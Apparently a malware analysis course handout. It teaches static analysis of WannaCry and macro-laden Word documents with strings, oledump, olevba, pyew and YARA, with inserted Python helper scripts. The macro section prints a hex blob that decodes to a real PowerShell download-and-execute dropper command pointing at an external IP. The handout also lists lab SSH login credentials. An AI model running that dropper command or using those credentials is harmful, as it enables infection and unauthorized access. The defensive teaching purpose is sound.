joemccray

Advanced Malware Analysis 2020

Dec 22nd, 2019 (edited)
#####################################################
# Advanced Malware Analysis 2020 #
# By Joe McCray #
#####################################################

- Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319


- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/


- I prefer to use PuTTY to SSH into my Linux host.
- You can download PuTTY from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into PuTTY

Host Name: 66.42.87.42
Protocol: SSH
Port: 22
Username: ama
Password: ama-secureninja!




If you are on a Mac (https://osxdaily.com/2017/04/28/howto-ssh-client-mac/)

Open a terminal, then type:
-------------------------------
ssh -l ama 66.42.87.42
------------------------------



Indicators of Compromise (IoC)
-----------------------------

1. Modify the filesystem - KERNEL32.dll (CreateFileA/W, WriteFile, DeleteFileA/W)
2. Modify the registry - ADVAPI32.dll (RegOpenKeyExA/W, RegSetValueExA/W; persistence)
3. Modify processes/services - KERNEL32.dll (CreateProcessA/W) and ADVAPI32.dll (OpenSCManagerA/W, CreateServiceA/W, StartServiceA/W)
4. Connect to the network - WS2_32.dll (Winsock: socket, connect, send, recv) or WININET.dll (InternetOpenA/W, InternetOpenUrlA/W, HttpSendRequestA/W)
  45.  
  46.  
  47.  
  48. if you can't detect a registry change across 5% of your network
  49.  
  50.  
  51.  
EDR Solution
------------


1. Static Analysis <----------------------------------------- Cloud based static analysis
Learn everything I can without actually running the file
- Modifies the filesystem - file integrity checker
- Modifies the registry
- Modifies processes/services
- Connects to the network



2. Dynamic Analysis
Runs the file in a VM/sandbox and records what it actually does (files written, registry keys set, processes/services created, network connections made)
  67.  
  68. ################
  69. # The Scenario #
  70. ################
  71. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  72.  
  73.  
  74. The fastest thing you can do is perform static analysis.
  75.  
  76.  
  77.  
  78.  
  79. ###################
  80. # Static Analysis #
  81. ###################
  82.  
---------------------------Type This-----------------------------------

cd ~/static_analysis

file wannacry.exe

cp wannacry.exe malware.pdf

file malware.pdf

hexdump -n 2 -C wannacry.exe

----------------------------------------------------------------------

file identifies the type from the magic bytes at the start of the file, not from the extension, so the renamed copy is still reported as a PE executable. Those first two bytes are what the hexdump command shows you.

***What is '4d 5a' or 'MZ'***
-------------------------Paste this URL into Firefox-----------------------------------
http://www.garykessler.net/library/file_sigs.html
---------------------------------------------------------------------------------------
  102.  
  103.  
  104.  
  105. ---------------------------Type This-----------------------------------
  106. cd ~/static_analysis
  107.  
  108. objdump -x wannacry.exe
  109.  
  110. objdump -x wannacry.exe | less
  111. q
  112.  
  113. strings wannacry.exe
  114.  
  115. strings wannacry.exe | grep -i dll
  116.  
  117. strings wannacry.exe | grep -i library
  118.  
  119. strings wannacry.exe | grep -i reg
  120.  
  121. strings wannacry.exe | grep -i key
  122.  
  123. strings wannacry.exe | grep -i rsa
  124.  
  125. strings wannacry.exe | grep -i open
  126.  
  127. strings wannacry.exe | grep -i get
  128.  
  129. strings wannacry.exe | grep -i mutex
  130.  
  131. strings wannacry.exe | grep -i irc
  132.  
  133. strings wannacry.exe | grep -i join
  134.  
  135. strings wannacry.exe | grep -i admin
  136.  
  137. strings wannacry.exe | grep -i list
  138. ----------------------------------------------------------------------
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomware analysis"


Reference
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

- Yara Rule -


Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
Ok, let's look for the individual strings


---------------------------Type This-----------------------------------
cd ~/static_analysis

strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
----------------------------------------------------------------------

Note: the Yara rule marks every string as "wide" as well as "ascii". GNU strings only prints single-byte (ASCII) strings by default, so a string stored as UTF-16LE will not show up in the greps above unless you add the -e l option.
  187.  
  188.  
  189.  
  190.  
  191.  
  192. ####################################
  193. # Tired of GREP - let's try Python #
  194. ####################################
  195. Decided to make my own script for this kind of stuff in the future. This is a really good script for the basics of static analysis
  196.  
  197. Reference:
  198. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  199.  
  200.  
  201. This is really good for showing some good signatures to add to the Python script
  202.  
  203.  
  204. ---------------------------Type This-----------------------------------
  205. cd ~/static_analysis
  206.  
  207. nano original_am.py
  208. ctrl-x
  209.  
  210. python3 original_am.py wannacry.exe
  211. ----------------------------------------------------------------------
  212.  
  213.  
  214. #####################################################
  215. # Analyzing Macro Embedded Malware #
  216. #####################################################
  217. ---------------------------Type This-----------------------------------
  218. cd ~/static_analysis/oledump
  219.  
  220. python oledump.py 064016.doc
  221.  
  222. python oledump.py 064016.doc -s A4 -v
  223. -----------------------------------------------------------------------
  224.  
  225.  
  226.  
- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A5 -v
-----------------------------------------------------------------------

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B

- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
-----------------------------------------------------------------------

- The blob is plain hex-encoded ASCII. It decodes to a cmd /K powershell.exe command line that uses System.Net.WebClient to download a file from an IP address into %TEMP% as a .cab, expands it to an .exe and starts it. If you would rather not send a live sample's download URL to a third-party web site, decode it locally (xxd -r -p, or Python's bytes.fromhex) instead.
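Decoding the blob offline, as an added example that is not part of the class notes: the script finds hex runs in a macro dump, decodes them, and pulls out the URL, the %TEMP% paths and the command-line tools used. HEX_BLOB is the blob shown above, copied verbatim; SAMPLE_VBA is a constructed stand-in for a few lines of the `oledump.py 064016.doc -s A3 -v` output so the blob finder has something to scan.

```python
"""Decode the hex-encoded command from the 064016.doc macro (stream A3) locally
and extract IoCs from it. Added example, not part of the class notes."""
import re

# The blob from the macro dump (variable GVhkjbjv), split into chunks for readability.
HEX_BLOB = (
    '636D64202F4B20'                                        # cmd /K
    '706F7765727368656C6C2E65786520'                        # powershell.exe
    '2D457865637574696F6E506F6C69637920'                    # -ExecutionPolicy
    '62797061737320'                                        # bypass
    '2D6E6F70726F66696C6520'                                # -noprofile
    '284E65772D4F626A65637420'                              # (New-Object
    '53797374656D2E4E65742E576562436C69656E7429'            # System.Net.WebClient)
    '2E446F776E6C6F616446696C6528'                          # .DownloadFile(
    '27687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E65786527'
    '2C272554454D50255C4A494F696F646668696F49482E63616227'
    '293B20657870616E6420'                                  # ); expand
    '2554454D50255C4A494F696F646668696F49482E63616220'
    '2554454D50255C4A494F696F646668696F49482E6578653B20'
    '737461727420'                                          # start
    '2554454D50255C4A494F696F646668696F49482E6578653B'
)

# Constructed stand-in for a few lines of the oledump -v output (not the real stream).
SAMPLE_VBA = (
    'Sub Auto_Open()\n'
    '    Dim GVhkjbjv As String\n'
    '    GVhkjbjv = "' + HEX_BLOB + '"\n'
    '    Shell Unhex(GVhkjbjv), vbHide\n'
    'End Sub\n'
)

# A run of hex digit pairs that is not glued to other hex digits (so odd-length
# runs, which bytes.fromhex would reject, are never returned).
HEX_RUN = re.compile(r'(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2})+)(?![0-9A-Fa-f])')
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
PATH_RE = re.compile(r"%[A-Za-z_]+%\\[^\s;'\"]+")
# Tool names worth flagging in a decoded dropper command (not an exhaustive list).
TOOLS = ('cmd', 'powershell.exe', 'expand', 'start', 'certutil', 'bitsadmin',
         'mshta', 'rundll32', 'regsvr32')

def find_hex_blobs(text, min_bytes=20):
    """Even-length runs of hex digits at least min_bytes long."""
    return [run for run in HEX_RUN.findall(text) if len(run) // 2 >= min_bytes]

def decode_hex_blob(hexstr):
    """Hex -> text. Non-ASCII bytes are kept as \\xNN escapes instead of crashing."""
    return bytes.fromhex(hexstr).decode('ascii', errors='backslashreplace')

def extract_iocs(command):
    """URLs, %VAR% paths and tool names used by a decoded command line."""
    return {
        'urls': sorted(set(URL_RE.findall(command))),
        'paths': sorted(set(PATH_RE.findall(command))),
        'tools': [t for t in TOOLS
                  if re.search(r'\b' + re.escape(t) + r'\b', command, re.IGNORECASE)],
    }

def analyze_macro_text(text):
    """Find every hex blob in a macro dump, decode it and report its IoCs."""
    reports = []
    for blob in find_hex_blobs(text):
        cmd = decode_hex_blob(blob)
        report = {'command': cmd}
        report.update(extract_iocs(cmd))
        reports.append(report)
    return reports

if __name__ == '__main__':
    for r in analyze_macro_text(SAMPLE_VBA):
        print(r['command'])
        for key in ('urls', 'paths', 'tools'):
            print('  %-5s %s' % (key, ', '.join(r[key])))
```

Run it on a real dump with `oledump.py sample.doc -s A3 -v > a3.txt` and pass the text of that file to analyze_macro_text; the hex-run regex is deliberately strict about length and alignment so ordinary identifiers in VBA source are not decoded by accident.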
  246.  
  247.  
  248.  
  249.  
  250. #########################################
  251. # Security Operations Center Job Roles #
  252. # Intrusion Analysis Level 1 #
  253. #########################################
  254. Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
  255. Comfortable with basic network (Network+)
  256. Comfortable with security fundamentals (Security+)
  257.  
  258.  
  259.  
  260.  
  261.  
  262. Job Task: Process security events, follow incident response triage playbook
  263.  
  264. #########################################
  265. # Security Operations Center Job Roles #
  266. # Intrusion Analysis Level 2 #
  267. #########################################
  268.  
  269. Required Technical Skills: Comfortable with basic Linux/Windows system administration
  270. Comfortable with basic network administration
  271. Comfortable with basic programming
  272. Comfortable researching IT security issues
  273.  
  274.  
  275.  
  276.  
  277.  
  278. Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook
  279.  
  280. #########################################
  281. # Security Operations Center Job Roles #
  282. # Intrusion Analysis Level 3 #
  283. #########################################
  284.  
  285. Required Technical Skills: Strong statistical analysis background
  286. Strong programming background (C, C++, Java, Assembly, scripting languages)
  287. Advanced system/network administration background
  288. Comfortable researching IT security issues
  289.  
  290.  
  291.  
  292.  
  293.  
  294. Job Task: Perform detailed malware analysis
  295. Perform detailed statistical analysis
  296. Assist with development of the incident response triage playbook
  297.  
  298.  
  299.  
  300.  
  301. -------------------------------------------------------------------------------------------------------------------------
  302.  
  303. Step 1: Receive suspicious file
  304. -------------------------------
  305. - Help Desk tickets
  306. - SIEM
  307. - AV
  308. - EDR
  309. - Email/Spam
  310. - Proxy
  311.  
  312.  
  313.  
  314. Step 2: Perform static analysis
  315. -------------------------------
1. Run strings/grep for the primary IoCs
- Modifies the registry
- Modifies processes/services
- Modifies the filesystem
- Connects to the network

A yes to any of these should help you decide whether you want to do dynamic analysis or not

Consideration 1: Encryption/Obfuscation/Packing - strings will show you very little, so you may have to do dynamic analysis

Consideration 2: If you're dealing with anti-analysis (sandbox, VM or debugger detection) - the sample may refuse to run in your sandbox, so you may have to fall back to static analysis
  327.  
  328.  
  329.  
  330.  
  331.  
  332. Step 3: Determine if the malware modifies the registry
  333. ------------------------------------------------------
  334.  
  335.  
  336. ---------------------------Type This-----------------------------------
  337. cd ~/static_analysis/
  338.  
  339. strings wannacry.exe | grep -i reg
  340.  
  341. strings wannacry.exe | grep -i hkcu
  342.  
  343. strings wannacry.exe | grep -i hklm
  344.  
  345. strings wannacry.exe | grep -i hkcr
  346. -----------------------------------------------------------------------
  347.  
  348.  
  349.  
Step 4: Determine if the malware modifies processes/services
------------------------------------------------------------

---------------------------Type This-----------------------------------
cd ~/static_analysis/
strings wannacry.exe | grep -i advapi32

strings wannacry.exe | grep -i service

strings wannacry.exe | grep -i OpenSCManagerA

strings wannacry.exe | grep -i InternetCloseHandle **** WinINet (network), not a service API

strings wannacry.exe | grep -i OpenServiceA

strings wannacry.exe | grep -i CloseServiceHandle

strings wannacry.exe | grep -i StartServiceCtrlDispatcherA

strings wannacry.exe | grep -i GetExitCodeProcess

strings wannacry.exe | grep -i GetProcAddress **** resolves APIs at run time; anything loaded this way is not in the import table, though the names may still be visible as strings
-----------------------------------------------------------------------
  375.  
  376.  
  377.  
Step 5: Determine if the malware modifies the file system
------------------------------------------------------------

---------------------------Type This-----------------------------------
cd ~/static_analysis/
strings wannacry.exe | grep -i GetTempPathW

strings wannacry.exe | grep -i GetWindowsDirectoryW

strings wannacry.exe | grep -i %TEMP%

strings wannacry.exe | grep -i GetFileAttributesA
-----------------------------------------------------------------------





Step 6: Does the malware have any persistence capability
--------------------------------------------------------
3 main ways for an attacker to maintain access to a compromised system (persistence)

- Registry (Run/RunOnce keys under HKCU or HKLM ...\Software\Microsoft\Windows\CurrentVersion; look for RegSetValueEx and CurrentVersion\Run in the strings)
- Service (CreateServiceA/W and StartServiceA/W, which need OpenSCManagerA/W first)
- Scheduled task (schtasks.exe on the command line, or the ITaskScheduler/ITaskService COM interfaces)

Two more to keep in mind: the Startup folder and WMI event subscriptions.
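The grep lists in Steps 3 to 6, and the am.py script from the "Tired of GREP - let's try Python" section, both boil down to the same thing: pull the strings out of the file and bucket them by what they suggest the sample can do. The script below does that in one pass, as an added example that is not the class's am.py. It extracts both ASCII strings and UTF-16LE (wide) strings, roughly what `strings` and `strings -e l` print, because Windows malware keeps a lot of its interesting text in the wide form. SAMPLE is constructed to look like part of an import table plus a few embedded strings; the API names in SIGNATURES are stock Win32 exports, not taken from any particular sample.

```python
"""Strings-based IoC triage: extract ASCII and UTF-16LE strings from a binary
and bucket them by IoC category. Added example, not the class's am.py."""
import re
from collections import defaultdict

# Substrings worth flagging, per IoC category. Matched case-insensitively.
SIGNATURES = {
    'filesystem': ['CreateFile', 'WriteFile', 'DeleteFile', 'MoveFile',
                   'GetTempPath', 'GetWindowsDirectory', '%TEMP%'],
    'registry': ['RegOpenKey', 'RegSetValue', 'RegCreateKey', 'RegDeleteValue',
                 'HKCU', 'HKLM', 'HKEY_', 'Software\\Microsoft'],
    'process_service': ['CreateProcess', 'OpenSCManager', 'CreateService',
                        'StartService', 'OpenProcess', 'WriteProcessMemory',
                        'CreateRemoteThread'],
    'network': ['WS2_32', 'socket', 'connect', 'InternetOpen', 'HttpSendRequest',
                'URLDownloadToFile', 'http://', 'https://'],
    'persistence': ['CurrentVersion\\Run', 'CreateService', 'schtasks',
                    'ITaskScheduler', 'Startup'],
}

def extract_strings(data, min_len=4):
    """Return (ascii_strings, wide_strings): printable runs of at least min_len
    characters, first as single bytes, then as UTF-16LE (char, NUL pairs)."""
    ascii_re = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    wide_re = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len)
    ascii_strs = [m.decode('ascii') for m in ascii_re.findall(data)]
    wide_strs = [m.decode('utf-16-le') for m in wide_re.findall(data)]
    return ascii_strs, wide_strs

def classify(strings):
    """Map each category to the sorted, de-duplicated strings hitting one of its signatures."""
    hits = defaultdict(set)
    for s in strings:
        low = s.lower()
        for category, sigs in SIGNATURES.items():
            if any(sig.lower() in low for sig in sigs):
                hits[category].add(s)
    return {c: sorted(v) for c, v in hits.items()}

def analyze(data):
    ascii_strs, wide_strs = extract_strings(data)
    return {
        'categories': classify(ascii_strs + wide_strs),
        # Strings that a plain `strings | grep` would never show you.
        'wide_only': sorted(set(wide_strs) - set(ascii_strs)),
    }

# Constructed sample: an MZ stub, import-table-like names, a wide registry path,
# a wide URL and one ASCII command line. Not bytes from any real file.
SAMPLE = (
    b'MZ\x90\x00' + b'\x00' * 8
    + b'KERNEL32.dll\x00CreateFileA\x00WriteFile\x00GetTempPathW\x00'
    + b'ADVAPI32.dll\x00RegSetValueExA\x00OpenSCManagerA\x00CreateServiceA\x00StartServiceA\x00'
    + b'WS2_32.dll\x00' + b'\x00' * 3
    + 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'.encode('utf-16-le') + b'\x00\x00'
    + 'http://example.invalid/payload.bin'.encode('utf-16-le') + b'\x00\x00'
    + b'icacls . /grant Everyone:F /T /C /Q\x00'
)

if __name__ == '__main__':
    import sys
    blob = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE
    report = analyze(blob)
    for category, found in report['categories'].items():
        print(category)
        for s in found:
            print('   ', s)
    print('wide only:', report['wide_only'])
```

A hit here is a reason to look closer, not a verdict: a packed or obfuscated sample will show almost nothing, and a benign installer will light up every category, which is exactly the situation Consideration 1 and Consideration 2 in Step 2 are about.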
  403.  
  404.  
  405.  
  406.  
  407. ##############
  408. # Class task #
  409. ##############
  410.  
  411. Task 1: Go to https://joesecurity.org/joe-sandbox-reports
  412.  
  413. Identify 5 reports for malware that are similar to what you've seen or been concerned about in your environment
  414.  
1. Maze
2. Bad Rabbit
3. Trojanized Adobe Installer
4. Emotet
5. Bitcoin miner
  420.  
  421.  
  422.  
  423. Task 2: What do you want to be able to find
  424. What did you see in each of these reports that you found interesting and would like to be able to look for in your investigations?
  425.  
  426. Task 3: Identify the unique strings that you would like to search for
  427. 1.
  428. 2.
  429. 3.
  430.  
  431.  
  432. Task 4: Unique classes of attack
  433. Identify the unique classes of signatures that interest us the most that are NOT in my am.py file list
  434. 1. Trickier http request methods
  435. 2. Dynamic libraries/API calls
  436. 3. Lateral movement
  437.  
  438.  
  439.  
  440. Task 5: Identify limitations of the script
  441. 1. Only analyzes exes
  442. 2. Too many functions and no classes
  443. 3. Not modular enough
  444. 4. Signature list is not very thorough
  445. 5. Doesn't save to db
  446.  
  447.  
  448.  
  449. ---------------------------Type This-----------------------------------
  450. cd /home/ama/malware_samples/office-doc_files
  451.  
  452. file sample1.doc
  453.  
  454. olevba sample1.doc
  455.  
  456. python /home/ama/static_analysis/oledump/oledump.py sample1.doc
  457. ----------------------------------------------------------------------
  458.  
  459.  
  460. What is oledump.py?
  461. ===================
  462.  
  463. Reference: https://blog.didierstevens.com/programs/oledump-py/
  464.  
  465. oledump.py is a program to analyze OLE files (Compound File Binary Format). These files contain streams of data. oledump allows you to analyze these streams.
  466.  
  467. Many applications use this file format, the best known is MS Office. .doc, .xls, .ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).
  468.  
  469.  
  470.  
  471. What is olevba?
  472. ===============
  473.  
  474. Reference: https://github.com/decalage2/oletools/wiki/olevba
  475.  
  476. olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel 4 Macros are also supported in Excel and SLK files.
  477.  
  478. It can be used either as a command-line tool, or as a python module from your own applications.
  479.  
  480. It is part of the python-oletools package.
  481.  
  482.  
  483. Now let's dig in with oledump
  484.  
  485.  
  486.  
  487. ---------------------------Type This-----------------------------------
  488. cd /home/ama/malware_samples/office-doc_files
  489.  
  490. python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A7 -v
  491.  
  492. python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A8 -v
  493.  
  494. python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A9 -v
  495. ----------------------------------------------------------------------
  496.  
  497.  
  498.  
  499.  
  500.  
  501.  
  502. Now let's dig in with olevba
  503.  
  504.  
  505.  
  506. ---------------------------Type This-----------------------------------
  507. cd /home/ama/malware_samples/office-doc_files
  508.  
  509. olevba sample1.doc --decode
  510.  
  511. olevba sample1.doc --deobf
  512. ----------------------------------------------------------------------
  513.  
  514.  
  515.  
  516. ###########
  517. ############################## EXE Files ###############################
  518. ###########
  519.  
  520. OK, let's take a look at exe files
  521.  
  522.  
  523.  
  524. ---------------------------Type This-----------------------------------
  525. cd /home/ama/malware_samples/exe_files
  526.  
  527. objdump -x sample1.exe
  528.  
  529. objdump -x sample1.exe | less
  530. q
  531.  
  532. strings sample1.exe
  533.  
  534. strings sample1.exe | grep -i dll
  535.  
  536. strings sample1.exe | grep -i library
  537.  
  538. strings sample1.exe | grep -i reg
  539.  
  540. strings sample1.exe | grep -i key
  541.  
  542. strings sample1.exe | grep -i rsa
  543.  
  544. strings sample1.exe | grep -i open
  545.  
  546. strings sample1.exe | grep -i get
  547.  
  548. strings sample1.exe | grep -i mutex
  549.  
  550. strings sample1.exe | grep -i irc
  551.  
  552. strings sample1.exe | grep -i join
  553.  
  554. strings sample1.exe | grep -i admin
  555.  
  556. strings sample1.exe | grep -i list
  557.  
  558. python3 ~/static_analysis/previous_class_am.py sample1.exe
  559. ----------------------------------------------------------------------
  560.  
  561.  
  562.  
Let's play with another tool called pyew.


Reference: https://github.com/joxeankoret/pyew

Pyew is a tool like radare or biew/hiew. It's a hexadecimal viewer and disassembler for IA32 and AMD64 with support for PE & ELF formats as well as other non-executable formats, like OLE2 or PDF.
  569.  
  570.  
  571.  
  572.  
  573. ---------------------------Type This-----------------------------------
  574. pyew sample1.exe
  575.  
  576. [0x00000000]> ?
  577.  
  578. [0x00000000]> md5
  579.  
  580. [0x00000000]> sha256
  581.  
  582. [0x00000000]> url
  583.  
  584. [0x00000000]> chkurl
  585. ----------------------------------------------------------------------
  586.  
Since this is a PE file, let's do some stuff that's specific for exe files

Here are the commands again:
Commands:

?/help           Show this help
x/dump/hexdump   Show hexadecimal dump
s/seek           Seek to a new offset
g/G              Goto BOF (g) or EOF (G)
+/-              Go forward/backward one block (specified by pyew.bsize)
c/d/dis/pd       Show disassembly
r/repr           Show string representation
p                Print the buffer
/x expr          Search hexadecimal string
/s expr          Search strings
/i expr          Search string ignoring case
/r expr          Search regular expression
/u expr          Search unicode expression
/U expr          Search unicode expression ignoring case
  606.  
  607.  
Now, let's see the disassembly at the entry point, so seek to it:
  609. ---------------------------Type This-----------------------------------
  610. [0x00000000]> s ep
  611. -----------------------------------------------------------------------
  612.  
  613.  
  614. And disassemble it with the command "c" (you may also use "d", "dis" or "pd"):
  615. ---------------------------Type This-----------------------------------
  616. [0x00025ce0:0x00426ae0]> c
  617. -----------------------------------------------------------------------
  618.  
  619. To see the code at the function's position, just type the number assigned to the function (the number after the ";" character):
  620. ---------------------------Type This-----------------------------------
  621. [0x00025ce0:0x00426ae0]> 1
  622. [0x00025d07:0x00426b07]> 2
  623. -----------------------------------------------------------------------
  624.  
  625.  
  626.  
  627. OK, we're done analyzing this function. To go back to the prior point (the entry point in our case) we can type "b" to go back:
  628. ---------------------------Type This-----------------------------------
  629. [0x00025d07:0x00426b07]> b
  630. -----------------------------------------------------------------------
  631.  
  632.  
To continue seeing more disassembly just press the enter key to see the next block's disassembly (BTW, if the last command was "x" to show the hexadecimal dump, pressing enter would show the next block's hexadecimal dump):
  634.  
  635.  
  636.  
  637. To list the functions detected by Pyew type "pyew.names":
  638. ---------------------------Type This-----------------------------------
  639. [0x00025cfe:0x00426afe]> pyew.names
  640. -----------------------------------------------------------------------
  641.  
  642.  
  643. Let's see if it was packed
  644. ---------------------------Type This-----------------------------------
  645. [0x00025ce0:0x00426ae0]> packer
  646. -----------------------------------------------------------------------
  647.  
  648.  
Let's see if it uses any anti-virtual-machine tricks
  650. ---------------------------Type This-----------------------------------
  651. [0x00025ce0:0x00426ae0]> antivm
  652. -----------------------------------------------------------------------
  653.  
  654.  
  655.  
  656.  
  657.  
  658.  
  659.  
  660. ##############
  661. # Yara Ninja #
  662. ##############
Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomware analysis"


Reference
https://www.mcafee.com/blogs/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/



- Yara Rule -


Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  683.  
  684.  
  685.  
  686.  
  687.  
  688.  
  689.  
  690.  
  691. Ok, let's look for the individual strings
  692.  
  693. ---------------------------Type This-----------------------------------
  694.  
  695.  
  696. strings wannacry.exe | grep -i ooops
  697.  
  698. strings wannacry.exe | grep -i wanna
  699.  
  700. strings wannacry.exe | grep -i wcry
  701.  
  702. strings wannacry.exe | grep -i wannacry
  703.  
  704. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  705.  
  706.  
  707. -----------------------------------------------------------------------
  708.  
  709.  
  710. #####################
  711. # Playing with Yara #
  712. #####################
  713. Let's see if we can get yara working.
  714.  
  715.  
  716.  
  717.  
  718.  
  719.  
  720.  
  721. ---------------------------Type This-----------------------------------
  722. cd ~/students/
  723.  
  724. mkdir [yourname]
  725.  
  726. cd [yourname]
  727.  
  728. cp ~/wannacry.exe .
  729.  
  730. nano wannacry_1.yar
  731.  
  732. ---------------------------Paste This-----------------------------------
  733. rule wannacry_1 : ransom
  734. {
  735. meta:
  736. author = "Joshua Cannell"
  737. description = "WannaCry Ransomware strings"
  738. weight = 100
  739. date = "2017-05-12"
  740.  
  741. strings:
  742. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
  743. $s2 = "Wanna Decryptor" wide ascii nocase
  744. $s3 = ".wcry" wide ascii nocase
  745. $s4 = "WANNACRY" wide ascii nocase
  746. $s5 = "WANACRY!" wide ascii nocase
  747. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  748.  
  749. condition:
  750. any of them
  751. }
  752.  
  753. ----------------------------------------------------------------------------
  754.  
  755.  
  756.  
  757.  
  758.  
  759. ---------------------------Type This-----------------------------------
  760.  
  761. yara wannacry_1.yar wannacry.exe
  762.  
  763. -----------------------------------------------------------------------
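What the modifiers in wannacry_1.yar actually match, shown with a tiny matcher as an added example: this is not part of the notes and not how YARA is implemented (YARA compiles every string of every rule into one automaton; this just searches each encoding of each string in turn). The rule strings are copied from the rule above; SAMPLE is a constructed buffer with one upper-case ASCII hit and one lower-case UTF-16LE hit, the second being the kind of thing `strings wannacry.exe | grep -i wanacry` never shows.

```python
"""Tiny matcher for YARA text-string modifiers (ascii, wide, nocase) and the
`any of them` condition. Added example, not YARA's own code."""
import re

# Copied from wannacry_1.yar above (the rule has no $s6).
RULE_STRINGS = {
    '$s1': 'Ooops, your files have been encrypted!',
    '$s2': 'Wanna Decryptor',
    '$s3': '.wcry',
    '$s4': 'WANNACRY',
    '$s5': 'WANACRY!',
    '$s7': 'icacls . /grant Everyone:F /T /C /Q',
}

def compile_string(text, ascii_=True, wide=True, nocase=True):
    """Expand one YARA text string into the byte patterns its modifiers imply.

    ascii  -> the bytes as typed (YARA's default when no modifier is given)
    wide   -> the same text as UTF-16LE, one NUL byte after every character
    nocase -> case-insensitive on the letters; this works on the wide form too
              because only the low byte of each character carries the case
    """
    variants = []
    if ascii_:
        variants.append(('ascii', text.encode('ascii')))
    if wide:
        variants.append(('wide', text.encode('utf-16-le')))
    flags = re.IGNORECASE if nocase else 0
    return [(enc, re.compile(re.escape(raw), flags)) for enc, raw in variants]

def match_rule(data, rule_strings=RULE_STRINGS):
    """{identifier: [(encoding, offset), ...]} for every rule string found in data."""
    hits = {}
    for ident, text in rule_strings.items():
        found = [(enc, m.start())
                 for enc, pat in compile_string(text)
                 for m in pat.finditer(data)]
        if found:
            hits[ident] = sorted(found, key=lambda h: h[1])
    return hits

def rule_matches(data, rule_strings=RULE_STRINGS):
    """condition: any of them"""
    return bool(match_rule(data, rule_strings))

# Constructed buffer, not bytes from wannacry.exe: '.WCRY' in ASCII at offset 16,
# then 'wanacry!' as UTF-16LE at offset 28.
SAMPLE = (b'\x00' * 16 + b'.WCRY' + b'\x00' * 7
          + 'wanacry!'.encode('utf-16-le') + b'\x00' * 9)

if __name__ == '__main__':
    for ident, where in match_rule(SAMPLE).items():
        print(ident, where)
    print('rule matches:', rule_matches(SAMPLE))
```

Two things worth remembering when you write your own rules: `wide` on its own replaces the ASCII form rather than adding to it (you need `wide ascii` to get both), and `nocase` makes a short string like ".wcry" much noisier, so prefer `all of them` or a count over `any of them` once you have more than a handful of strings.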
  764.  
  765.  
  766.  
  767.  
  768.  
  769. ---------------------------Type This-----------------------------------
  770.  
  771. nano wannacry_2.yar
  772.  
  773. ---------------------------Paste This-----------------------------------
  774. rule wannacry_2{
  775. meta:
  776. author = "Harold Ogden"
